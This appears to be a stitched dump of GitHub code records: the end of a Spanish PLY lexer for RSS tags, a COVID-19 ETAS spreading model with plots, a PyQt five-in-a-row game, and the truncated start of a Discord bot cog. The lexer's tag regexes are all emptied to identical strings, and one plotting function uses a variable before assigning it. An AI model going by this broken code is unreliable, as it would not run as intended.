'APERTURA_ULTEDIT', 'CIERRE_ULTEDIT', 'APERTURA_AUTOR','CIERRE_AUTOR', 'APERTURA_BD', 'CIERRE_BD', 'APERTURA_GUID', 'CIERRE_GUID', 'APERTURA_TTL', 'CIERRE_TTL',\n ]\n\ntokens = reservadas+['TXT', 'NUM',]\n\n\nt_APERTURA_XML =r'\\<\\?xml'\nt_VERSION_XML =r'\\ version=\"1.0\"'\nt_ENCODING_VERSION= r'\\ encoding=\"UTF-8\"'\nt_CIERRE_XML= r'\\?\\>'\n#tokens rss\nt_APERTURA_RSS=r'\\'\nt_CIERRE_RSS=r'\\'\n#tokens tags generales\nt_APERTURA_CHANNEL = r'\\'\nt_CIERRE_CHANNEL = r'\\' \nt_APERTURA_TITLE = r'\\'\nt_CIERRE_TITLE = r'\\'\nt_APERTURA_LINK=r'\\'\nt_CIERRE_LINK=r'\\'\nt_APERTURA_DESC=r'\\'\nt_CIERRE_DESC=r'\\'\nt_APERTURA_CAT=r'\\'\nt_CIERRE_CAT=r'\\'\nt_APERTURA_COPY=r'\\'\nt_CIERRE_COPY=r'\\'\nt_APERTURA_IMAG=r'\\'\nt_CIERRE_IMAG=r'\\'\nt_APERTURA_HEIGHT=r'\\'\nt_CIERRE_HEIGHT=r'\\'\nt_APERTURA_WIDTH=r'\\'\nt_CIERRE_WIDTH=r'\\'\nt_APERTURA_ITEM=r'\\'\nt_CIERRE_ITEM=r'\\'\nt_APERTURA_LANGUAGE=r'\\'\nt_CIERRE_LANGUAGE=r'\\'\nt_APERTURA_WEBMASTER=r'\\'\nt_CIERRE_WEBMASTER=r'\\'\nt_APERTURA_ULTEDIT=r'\\'\nt_CIERRE_ULTEDIT=r'\\'\nt_APERTURA_AUTOR=r'\\'\nt_CIERRE_AUTOR=r'\\'\nt_APERTURA_BD=r'\\'\nt_CIERRE_BD=r'\\'\nt_APERTURA_GUID=r'\\'\nt_CIERRE_GUID=r'\\'\nt_APERTURA_TTL=r'\\'\nt_CIERRE_TTL=r'\\'\nt_ignore = '\\t'\n\n#definición de tokens simbolos\ndef t_URL(t):\n r'(https|http|ftp|ftps)://(?:[a-zA-Z0-9]*[.][a-zA-Z]*[a-zA-Z.0-9?%/_=:#&$-]*)'\n t.type='URL'\n return t\n\n#definición de tokens de cadena de texto\ndef t_TXT(t): \n\tr'[a-zA-Z][a-zA-Z.,:\\:\\+\\t áéíóú0-9]*'\n\tif t.value.upper() in reservadas:\n\t\tt.value = t.value.upper()\n\t\tt.type = t.value\n\n\treturn t\n\n\n#definición de tokens de cadena de numeros\ndef t_NUM(t):\n\tr'\\d+'\n\tt.value = int(t.value)\n\treturn t\n\n#definición de tokens de cadena de URL\n\n \n#definición de salto de pagina\ndef t_newline(t):\n\tr'\\n+'\n\tt.lexer.lineno += len(t.value)\n\n\ndef t_COMMENT(t):\n\tr'\\#.*'\n\tpass\n\ndef t_error(t):\n\t#print (\" LexToken(SALTODEPAG)%s'\" % t.value[0])\n\tt.lexer.skip(1)\n\nanalizador = lex.lex()", "repo_name": "deadour/SSL-LexerParser", "sub_path": "src/lex.py", "file_name": "lex.py", "file_ext": "py", "file_size_in_byte": 2876, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "ply.lex.lex", "line_number": 100, "usage_type": "call"}, {"api_name": "ply.lex", "line_number": 100, "usage_type": "name"}]} +{"seq_id": "26649923055", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom math import pi\nfrom scipy import signal\n\ndef pdegconv(a,s):\n r'''pad given 1D sequence a using edge values and convolve it with s:\n inputs:\n a--1D sequence (1D float(int) array: (na-))\n s--smoother (1D float(int) array: (ns-))\n output:\n smoothed 1D sequence (1D float array: (na-))'''\n ns = len(s)\n if ns % 2:\n pl = int((ns-1)/2) # ns must be odd\n else:\n raise ImportError('The smoother length must be odd!')\n apeg = np.pad(a,(pl,pl),'edge')\n y = np.convolve(apeg,s,'valid')\n return y\n\nclass infevnt:\n def __init__(self):\n r'''intialize an infection event'''\n self.indx = np.zeros((0,2),dtype=np.int16)\n self.indt = np.zeros(0,dtype=np.int16)\n self.Ni = np.zeros(0,dtype=np.int16)\n self.ne = 0\n \n def evnt_add(self,indx,indt,Ni):\n r'''add extra events into current history:\n inputs:\n indx--infection event position grid indices (2D int array: (ne-by-2))\n indt--infection event time (1D int array: (ne-))\n Ni--infection number of this event (1D int array: (ne-))'''\n self.indx = np.concatenate((self.indx,indx),axis=0)\n self.indt = np.concatenate((self.indt,indt),axis=0)\n self.Ni = np.concatenate((self.Ni,Ni),axis=0)\n self.ne += len(Ni)\n \n def evnt_del(self,Hd_d):\n r'''reduce events from current history:\n inputs:\n Hd_d--event histroy being deleted (infevnt class)'''\n mask = np.zeros(self.ne,dtype=bool)\n for i in range(Hd_d.ne):\n mask += (Hd_d.indx[i,0]==self.indx[:,0])\\\n *(Hd_d.indx[i,1]==self.indx[:,1])\\\n *(Hd_d.indt[i]==self.indt)\\\n *(Hd_d.Ni[i]==self.Ni)\n self.indx = self.indx[~mask]\n self.indt = self.indt[~mask]\n self.Ni = self.Ni[~mask]\n self.ne = len(self.Ni)\n\n def evnt_t(self,indt):\n r'''find infection events at time indt:\n input:\n indt--time of the infection event (int scalar)'''\n mask = self.indt==indt\n return self.indx[mask], self.Ni[mask]\n \n def NIcal(self,tr):\n r'''calculate total infected number along time:\n input:\n tr--time indices (1D int array: (nt-))'''\n nt = len(tr)\n NI = np.zeros(nt)\n for i in range(nt):\n _, Ni = self.evnt_t(tr[i])\n NI[i] = np.sum(Ni)\n return NI\n \n def Ical(self,dmg,t):\n r'''calculate the immunity ratio at time t:\n input:\n dmg--population density (2D float array: (ny-by-nx))\n t--time index (int scalar)\n '''\n I = np.zeros_like(dmg)\n for i in range(t):\n indx, Ni = self.evnt_t(i)\n if len(Ni) > 0:\n sub = tuple(indx.transpose())\n I[sub] += Ni/dmg[sub]\n return I\n \n def LdHdNi_cal(self,nt):\n r'''calculate Ld and HdNi up to time t:\n inputs:\n nt--time index (int scalar)\n outputs:\n Ld--infection event number at each day (1D int array: (nt-))\n HdNi--infected number for each event, aligned from day 0 to t (1D int array: (Nt-))'''\n Ld = np.zeros(nt,dtype=np.int16)\n HdNi = np.zeros(0,dtype=np.int16)\n for i in range(nt):\n _, Ni = self.evnt_t(i)\n Ld[i] = len(Ni)\n if Ld[i] != 0:\n HdNi = np.concatenate((HdNi,Ni))\n return Ld, HdNi\n\ndef gd(t,tau,sig,cf=None,norm=True):\n r'''create temporal function for the infectability of an infecious disease:\n inputs:\n t--time sequence (1D float array: (nt-))\n tau--time of peak symptoms (float scalar)\n sig--standard deviation of the infectability distribution along time (float scalar)\n cf--cutoff time for the infectability function, due to quarantine or hospitalization (float scalar)\n output:\n y--infectability time sequence (1D float array: (nt-))'''\n y = np.exp(-0.5*((t-tau)/sig)**2)\n if norm:\n y = y/np.sum(y)\n if cf is not None:\n y = y[t<=cf]\n return y \n \nclass fxxi:\n r'''spatial intensity distribution: Gaussian plus stationary background (proportional to log scale population distribution)'''\n def __init__(self, shape, effarea=None, bkd=None):\n r'''shape--structure modeling area (int tuple: (2-))\n effarea--effective area mask (2D boolean array, (ny-by-nx))\n bkd--background distribution (2D float array, (ny-by-nx)'''\n self.shape = shape\n if effarea is None:\n self.effarea = np.ones(shape, dtype=bool) # default effarea is the total structure area\n else:\n self.effarea = effarea # effarea is the given mask\n # global background\n if bkd is None:\n self.bkd = np.zeros(shape)\n self.bkd[self.effarea] = 1/np.sum(effarea) # default bkd is homogeneous\n else:\n self.bkd = bkd/np.sum(bkd[self.effarea])\n self.bkd[~effarea] = 0 # bkd is the given bkd normalized within the effarea\n \n def _gaussfun(self,sig):\n r'''Gaussian possibility function:\n input:\n sig--standard deviation of the Gaussian possiblity function (float scalar)\n output:\n local Gaussian distribution (2D float array: (ngy-by-ngx))'''\n # the size of the gaussian filter is ny-by-ny\n ny = int(2*np.around(3*sig)+1)\n nx = ny\n G = np.zeros((ny,nx))\n # generate grid and center\n [Y, X] = np.meshgrid(range(ny),range(nx), indexing='ij')\n xc = (ny/2,nx/2)\n r2 = (X-xc[1])**2+(Y-xc[0])**2\n G = 1/(sig**2*2*pi)*np.exp(-0.5*r2/sig**2)\n G = G/np.sum(G)\n return G\n \n def convplus(self, gNi_map, sig, wG):\n r'''caculate the spatial intensity distribution according to given infection map:\n input:\n gNi_map--total infection number for all infection events that have influence upto time t (2D int array: (ny-by-nx))\n wG--Gassian distribution weight (float scalar)\n output:\n expected infection intensity (2D float array: (ny-by-nx)) '''\n gx = self._gaussfun(sig)\n y = wG*signal.convolve2d(gNi_map, gx, mode='same') # local Gaussian\n y += (1-wG)*np.sum(gNi_map)*self.bkd # global background\n y[~self.effarea] = 0 # mute outside the valid area\n return y\n\nclass ifds_ETAS:\n r'''create infectious disease spreading model and predict future infected distribution based on ETAS'''\n def __init__(self,dmg,gn,N0,k,a,fx,Hd=None):\n r'''initialization:\n inputs:\n dmg--population distribution (2D float array: (ny-by-nx))\n gn--normalized infectability time sequence (1D float array: (ng-))\n ng--length of gn (int scalar)\n N0--infected number threshold for single infection event (int scalar)\n k,a--hd parameters (float scalar)\n fx--spatial infection PDF (fxxi class)'''\n self.dmg = dmg\n self.gn = gn\n self.ng = len(gn)\n self.N0 = N0\n self.k = k\n self.a = a\n self.fx = fx\n self.size = fx.bkd.size\n if Hd is None:\n self.Hd = infevnt()\n else:\n self.Hd = Hd\n \n def LdnI_cal(self,t,R0,I,sig,wG):\n r'''According to infection event history and current R0, sig, wG, as well as fxxi, predict next day's infection:\n inputs:\n t--current day index (int scalar)\n R0--current reproduction number (int scalar)\n sig--current short-distance human movement range (float scalar)\n wG--current weight for short-distance human movement within total movement (including short-distance and long-distance)\n output:\n nI--next-day expected infection distribution (2D float array: (ny-by-nx))\n Ld--infection event number at day t (int scalar)'''\n y = np.zeros(self.fx.shape)\n Ld = 0\n for i in range(self.ng):\n indt = t-i-1\n if indt<0:\n continue\n indx, Ni = self.Hd.evnt_t(indt)\n subx = tuple(indx.transpose())\n y[subx] += Ni*self.gn[i]\n Ld += np.sum(self.k*(Ni/self.N0)**self.a*self.gn[i])\n if np.all(y==0):\n nI = y\n else:\n nI = R0*(1-I)*self.fx.convplus(y,sig,wG)\n return Ld,nI\n\n def formod(self,R0t,sigt,wGt,t0=0,I0=None,Hdi=None):\n r'''modeling infecious disease spreading from day t0, according to given parameters:\n inputs:\n R0--basic reproduction number for the modeled nt days (float scalar: (nt-))\n sigt--Gassian distribution (short-distance human movement) parameter varying within nt days (1D float array: (nt-))\n wGt--Gassian distribution (short-distance human movement) weight varying within nt days (1D float array: (nt-))\n t0--starting day index (int scalar)\n I0--immunity at the starting day t0 (2D float array: (ny-by-nx))\n Hdi--imported infection events (infevnt class)\n output:\n self.Hd--updated community infection events (infevnt class)\n nIt--expected infected distributions of modeled nt days (nt-by-ny-by-nx)'''\n \n ################################\n # some random perturbation on predicted Ld and Ni\n ptbN = np.random.normal(scale=0.2,size=100000)\n ptbN[ptbN<-0.95] = -0.95\n ptbN[ptbN>0.95] = 0.95\n c = 0\n ################################\n \n nt = len(R0t)\n nIt = np.zeros((nt,self.fx.shape[0],self.fx.shape[1]))\n if I0 is None:\n I0 = np.zeros(self.fx.shape)\n I = I0\n if Hdi is None:\n Hdi = infevnt()\n # step forward from t0\n for i in range(nt):\n print(f'{i}/{nt}')\n t = i+t0\n # calculate susceptible population\n Ns = self.dmg*(1-I)\n # import infection events\n indx, Ni = Hdi.evnt_t(t)\n indt = np.zeros_like(Ni)+t\n self.Hd.evnt_add(indx,indt,Ni)\n # calculate nI and Ld\n Ld, nI = self.LdnI_cal(t,R0t[i],I,sigt[i],wGt[i])\n ### perturb and int Ld ###\n Ld = int(Ld*(1+ptbN[c]))\n c += 1\n ### perturb and int Ld ###\n nIt[i] = nI\n if Ld != 0:\n nIf = nI.flatten()\n NI = np.sum(nIf)\n # sampling Ld positions \n ind = np.random.choice(self.size,size=Ld,replace=False,p=nIf/NI)\n sub = np.unravel_index(ind,self.fx.shape)\n indx = np.array(sub).transpose()\n # add new infection events into Hd\n indt = np.zeros(Ld,dtype=np.int16)+t\n Ni = NI*nI[sub]/np.sum(nI[sub])\n ### perturb and int Ni ###\n Ni = np.array(Ni*(1+ptbN[c:c+Ld]),dtype=np.int16)\n c += Ld\n ### perturb and int Ni ###\n Nss = np.array(Ns[sub],dtype=np.int16)\n Ni[Ni>Nss] = Nss[Ni>Nss]\n self.Hd.evnt_add(indx,indt,Ni)\n # update I\n I[sub] += Ni/self.dmg[sub]\n I[I>1] = 1\n return nIt\n \nclass dispift:\n r'''display infection events and expected infection distribution'''\n def __init__(self,fx,dpi=80,outpath=None):\n r'''input:\n fx--fxxi class'''\n self.bkd = fx.bkd\n self.bkd[~fx.effarea] = float(\"nan\")\n self.shape = fx.shape\n [Y,X] = np.meshgrid(range(self.shape[0]),range(self.shape[1]), indexing='ij')\n self.Y = Y\n self.X = X\n self.dpi = dpi\n self.path = outpath\n \n def setscale(self,ax):\n r'''plot the scale indicator on ax'''\n x1 = 300\n x2 = 380\n x3 = 330\n y1 = 220\n y2 = 215\n y3 = 210\n ax.set_xticks([])\n ax.set_yticks([])\n ax.plot([x1,x2],[y1,y1],'r',linewidth=3,zorder=100)\n ax.plot([x1,x1],[y1,y2],'r',linewidth=3,zorder=100)\n ax.plot([x2,x2],[y1,y2],'r',linewidth=3,zorder=100)\n _ = ax.text(x3,y3,'10 km',color='r',fontsize=15,zorder=100)\n \n def setinform(self,ax,t,Ld,NI):\n x0 = 20\n y0 = 20\n x1 = 360\n y1 = 40\n ax.text(x0,y0,f'Day: {t}',color='k',fontsize=15,zorder=100)\n ax.text(x1,y0,f'$\\lambda_d={Ld}$',color='k',fontsize=15,zorder=100)\n ax.text(x1,y1,f'$N_I={NI}$',color='k',fontsize=15,zorder=100)\n \n def dispevnt_history(self,t,Hdc,Hdi=None):\n r'''display the infection events along time from day 0 to day t:\n inputs:\n t: last day being plot (int scalar)\n Hdc: community infection event history (infevnt class)\n Hdi: imported infection event history (infevnt class)'''\n yc = np.zeros(self.shape)\n yi = np.zeros(self.shape)\n for i in range(t):\n # plot background\n fig, ax = plt.subplots(1,1,figsize=(20,9),frameon=True)\n ax.imshow(self.bkd,cmap='gray',zorder=10)\n ne = 0\n NI = 0\n indx, Ni = Hdc.evnt_t(i)\n subx = tuple(indx.transpose())\n yc[subx] += Ni\n mask = yc!=0\n ne += len(Ni)\n NI += np.sum(Ni)\n ax.scatter(self.X[mask],self.Y[mask],s=yc[mask], alpha=0.7, c='blue', zorder=30)\n if Hdi is not None:\n indx, Ni = Hdi.evnt_t(i)\n subx = tuple(indx.transpose())\n yi[subx] += Ni\n mask = yi!=0\n ne += len(Ni)\n NI += np.sum(Ni)\n ax.scatter(self.X[mask],self.Y[mask],s=yi[mask], alpha=0.7, c='orange', zorder=40) \n self.setscale(ax)\n self.setinform(ax,i,ne,NI)\n for axis in ['top','bottom','left','right']:\n ax.spines[axis].set_linewidth(4)\n plt.show()\n if self.path is not None:\n BB = ax.get_position()\n BB.x0 = 4.2\n BB.x1 = 16.3\n BB.y0 = 1\n BB.y1 = 8\n fig.savefig(f'{self.path}/evnt_history_day_0-{i}.png',dpi=self.dpi,bbox_inches=BB)\n \n \n def dispevnt_current(self,t,Hdc,Hdi=None):\n r'''display the infection events at day t:\n inputs:\n t: the day being plot (int scalar)\n Hdc: community infection event history: (infevnt class)\n Hdi: imported infection event history: (infevnt class)'''\n yc = np.zeros(self.shape)\n yi = np.zeros(self.shape)\n ne = 0\n nI = 0\n indx, Ni = Hdc.evnt_t(t)\n subx = tuple(indx.transpose())\n yc[subx] = Ni\n mask = yc!=0\n ne += len(Ni)\n NI += np.sum(Ni)\n # plot background\n fig, ax = plt.subplots(1,1,figsize=(20,9),frameon=True)\n ax.imshow(self.bkd,cmap='gray',zorder=10)\n ax.scatter(self.X[mask],self.Y[mask],s=yc[mask], alpha=0.7, c='blue', zorder=30)\n if Hdi is not None:\n indx, Ni = Hdi.evnt_t(t)\n subx = tuple(indx.transpose())\n yi[subx] = Ni\n mask = yi!=0\n ne += len(Ni)\n NI += np.sum(Ni)\n ax.scatter(self.X[mask],self.Y[mask],s=yi[mask], alpha=0.7, c='orange', zorder=40)\n self.setscale(ax)\n self.setinform(ax,t,ne,NI)\n for axis in ['top','bottom','left','right']:\n ax.spines[axis].set_linewidth(4)\n plt.show()\n if self.path is not None:\n BB = ax.get_position()\n BB.x0 = 4.2\n BB.x1 = 16.3\n BB.y0 = 1\n BB.y1 = 8\n fig.savefig(f'{self.path}/infevnt_day_{t}.png',dpi=self.dpi,bbox_inches=BB)\n \n def dispnI(self,t,nI,indx,Ni):\n r'''display the infection events and the expected infected distribution at day t:\n inputs:\n t--day index (int scalar)\n nI--expected infected distribution at day t (2D float array: (ny-by-nx))\n indx--infection event positions at day t (2D int array: (ne-by-2))\n Ni--infected number of infection events at day t (1D int array: (ne-))'''\n y = np.zeros(self.shape)\n subx = tuple(indx.transpose())\n y[subx] = Ni\n mask = y!=0\n NI = np.sum(nI)\n if NI==0:\n nI[0,0] = 1\n NI = 1\n # plot background\n fig, ax = plt.subplots(1,1,figsize=(20,9),frameon=True)\n ax.imshow(self.bkd,cmap='gray',zorder=10)\n ax.imshow(-nI/NI,cmap='hot',alpha=0.9,zorder=20)\n #ax.scatter(self.X[mask],self.Y[mask],s=y[mask], alpha=0.7, c='green', zorder=30)\n self.setscale(ax)\n self.setinform(ax,t,len(Ni),np.sum(Ni))\n for axis in ['top','bottom','left','right']:\n ax.spines[axis].set_linewidth(2)\n if self.path is not None:\n BB = ax.get_position()\n BB.x0 = 4.2\n BB.x1 = 16.3\n BB.y0 = 1\n BB.y1 = 8\n fig.savefig(f'{self.path}/expinfdis_day_{t}.png',dpi=self.dpi,bbox_inches=BB)\n plt.show()\n\n\n", "repo_name": "nusbei/COVID-19-modeling", "sub_path": "ETAS_fun.py", "file_name": "ETAS_fun.py", "file_ext": "py", "file_size_in_byte": 17607, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.pad", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.convolve", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 26, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 27, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 95, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 96, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.around", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 150, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 153, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 154, "usage_type": "call"}, {"api_name": "scipy.signal.convolve2d", "line_number": 165, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 165, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 213, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 214, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 235, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 235, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 242, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 244, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 256, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 267, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 269, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 269, "usage_type": "attribute"}, {"api_name": "numpy.unravel_index", "line_number": 270, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 271, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 273, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 273, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 274, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 276, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 276, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 279, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 279, "usage_type": "attribute"}, {"api_name": "numpy.meshgrid", "line_number": 295, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 331, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 332, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 335, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 335, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 344, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 352, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 358, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 358, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 374, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 375, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 383, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 385, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 385, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 394, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 400, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 400, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 416, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 420, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 425, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 425, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 430, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 440, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 440, "usage_type": "name"}]} +{"seq_id": "38020012357", "text": "#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport sys\nfrom PyQt5.QtCore import pyqtSignal\nfrom PyQt5.QtWidgets import QWidget, QGridLayout, QPushButton, QApplication, QMessageBox\nfrom FiveInRow import FiveInRow\nfrom FiveInRowPlayers import FiveInRowPlayer\nfrom MinimaxPlayer import MinimaxPlayer\nfrom time import sleep\n\nclass FiveInRowCell(QPushButton):\n def __init__(self, txt, x, y):\n super().__init__(txt)\n self.x = x\n self.y = y\n\n def getCoordinates(self):\n return (self.y, self.x)\n\nclass FiveInRowGui(QWidget):\n startSignal = pyqtSignal()\n endSignal = pyqtSignal(int)\n\n def __init__(self):\n\n super().__init__()\n\n self.startSignal.connect(self.constructBoard)\n self.endSignal.connect(self.endGame)\n\n self.grid = QGridLayout()\n self.grid.setSpacing(0)\n self.setLayout(self.grid)\n\n self.player = None\n self.move = None\n self.gameOver = False\n\n self.setWindowTitle('FiveInRow')\n self.show()\n\n self.symbols = [' ', 'X', 'O']\n self.colors = ['black', 'red', 'blue']\n\n def colorToStyle(self, color):\n return 'QPushButton {color: ' + color + '; font-size: 24pt;}'\n\n def cellClicked(self):\n if self.move is None:\n self.move = self.sender().getCoordinates()\n if self.player is not None:\n idx = self.player.number\n self.sender().setText(self.symbols[idx])\n self.sender().setStyleSheet(self.colorToStyle(self.colors[idx]))\n print(self.move)\n\n def startTurn(self, player):\n #self.constructBoard(board)\n self.move = None\n self.player = player\n self.startSignal.emit()\n\n def getMove(self):\n return self.move\n\n def endGame(self, winner):\n if self.gameOver:\n return\n\n self.gameOver = True\n\n msg = QMessageBox()\n msg.setIcon(QMessageBox.Information)\n\n txt = \"It's a draw!\" if winner == 0 else \"Player\" + str(winner) + \" wins!\"\n msg.setText(txt)\n msg.setWindowTitle(txt)\n\n msg.setStandardButtons(QMessageBox.Ok)\n msg.buttonClicked.connect(msg.close)\n\n msg.exec_()\n\n def constructBoard(self):\n if self.player is None:\n return\n\n for x,row in enumerate(self.player.game.board):\n for y,cell in enumerate(row):\n\n cellButton = FiveInRowCell(self.symbols[cell], x, y)\n cellButton.setFixedSize(50,50)\n cellButton.setStyleSheet(self.colorToStyle(self.colors[cell]))\n cellButton.clicked.connect(self.cellClicked)\n self.grid.addWidget(cellButton, x, y)\n\nclass QtPlayer(FiveInRowPlayer):\n def __init__(self, gui):\n super().__init__()\n self.gui = gui\n\n def requestMove(self):\n self.gui.startTurn(self)\n move = None\n while move is None:\n sleep(0.2)\n move = self.gui.getMove()\n return move\n\n def notifyWin(self):\n self.gui.startTurn(self)\n self.gui.endSignal.emit(self.number)\n\n def notifyLoss(self):\n self.gui.startTurn(self)\n self.gui.endSignal.emit(self.opponentNumber)\n\n def notifyDraw(self):\n if self.number == 1:\n self.gui.endSignal.emit(0)\n\n\nif __name__ == '__main__':\n\n app = QApplication(sys.argv)\n gamegui = FiveInRowGui()\n\n p1 = QtPlayer(gamegui)\n #p2 = QtPlayer(gamegui)\n p2 = MinimaxPlayer(5)\n\n game = FiveInRow(p1, p2)\n game.start()\n\n sys.exit(app.exec_())\n game.join()\n", "repo_name": "mvjseppa/FiveInRow", "sub_path": "QtPlayer.py", "file_name": "QtPlayer.py", "file_ext": "py", "file_size_in_byte": 3559, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 12, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 21, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 22, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 23, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QGridLayout", "line_number": 32, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 73, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.Information", "line_number": 74, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 74, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.Ok", "line_number": 80, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 80, "usage_type": "name"}, {"api_name": "FiveInRowPlayers.FiveInRowPlayer", "line_number": 98, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 107, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 126, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 126, "usage_type": "attribute"}, {"api_name": "MinimaxPlayer.MinimaxPlayer", "line_number": 131, "usage_type": "call"}, {"api_name": "FiveInRow.FiveInRow", "line_number": 133, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 136, "usage_type": "call"}]} +{"seq_id": "42344114668", "text": "# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\nCryptide Forbidden Cog\r\n~~~~~~~~~~~~~~~~~~~~~~\r\n\r\nThis Allows Forbidden/Owner/Test Commands That Need/Use Cog Functions To Be Used As An Extension.\r\n\r\n:copyright: (c) 2021 Trenton \"Kawasaki\" G\r\n:terms: No Public Use\r\n:visibilty: Private Cog\r\n\r\n\"\"\"\r\n\r\n#Discord\r\nimport discord\r\nfrom discord.ext import commands\r\n\r\n#Others\r\nfrom akaneko import akaneko\r\nimport random\r\nimport ast\r\nfrom AntiSpam.Util import transform_message\r\nfrom discord.ext.buttons import Paginator\r\nfrom __utils__.util import *\r\n\r\nclass Forbidden(commands.Cog, name=\"Forbidden\"):\r\n\tdef __init__(self, bot):\r\n\t\tself.bot = bot\r\n\r\n\t#This command exists for security reasons. don't remove my bot ;-;\r\n\t@commands.command()\r\n\tasync def servers(self, ctx):\r\n\t activeservers = self.bot.guilds\r\n\t for guild in activeservers:\r\n\t await ctx.send(f\"`{guild.name}` : `{guild.id}`\")\r\n\r\n\t@commands.command(aliases=['disconnect', 'close', 'stopbot'])\r\n\t@commands.is_owner()\r\n\tasync def logout(self, 